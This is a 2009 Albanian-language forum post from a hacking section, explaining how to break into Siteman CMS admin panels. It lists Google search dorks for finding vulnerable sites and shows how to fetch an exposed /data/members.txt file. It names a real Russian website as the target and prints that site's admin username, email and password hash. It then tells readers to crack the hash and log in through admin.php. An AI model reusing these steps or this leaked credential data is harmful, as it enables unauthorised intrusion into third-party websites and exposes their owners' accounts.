AlbStyle.Tk

By BeSi
 
ForumForum  PortaliPortali  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Siteman Personal Website CMS

Shko poshtë 
AutoriMesazh
BeSi
Admin
avatar

Numri i postimeve : 135
Join date : 21/04/2009
Age : 28
Location : Albania/Tropoje

MesazhTitulli: Siteman Personal Website CMS   Fri Apr 24, 2009 12:23 am

Në vazhdim po shpejgojmë si të futemi në admin të SiteMan

Dork: Powered by Siteman personal website CMS
Powered by Siteman
allinurl:data/members.txt

Marim shembull këtë faqe ruse:
http://www.watusa.ru

Pas linkut i shtojmë edhe: /data/members.txt

psh: http://www.watusa.ru/data/members.txt

kur të hapet file do të shohim:
1|siteman|03f3fdd77e71b9156886e7e5199abad|5|admin@open-world.ru|Webmaster|106738881|??????? ?????????|eec96095a4b5aaecea632f237d6242fe|1|1230215662|0|<span style="color:#BB0000;">The </span><span style="color:#0000BB;">Webmaster</span> |

Admin i faqës është: siteman
Passwordi: 03f3fdd77e71b9156886e7e5199abad

Më pas e crackiratim hash-in dhe gjejmë passwordin real

Që të futemi në admin control panel prapa linkut shkruajmë: admin.php

Psh: http://www.watusa.ru/admin.php
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://wWw.AlbStyle.Tk
 
Siteman Personal Website CMS
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
AlbStyle.Tk  :: Argetim :: Arkiva :: Hacking-
Kërce tek: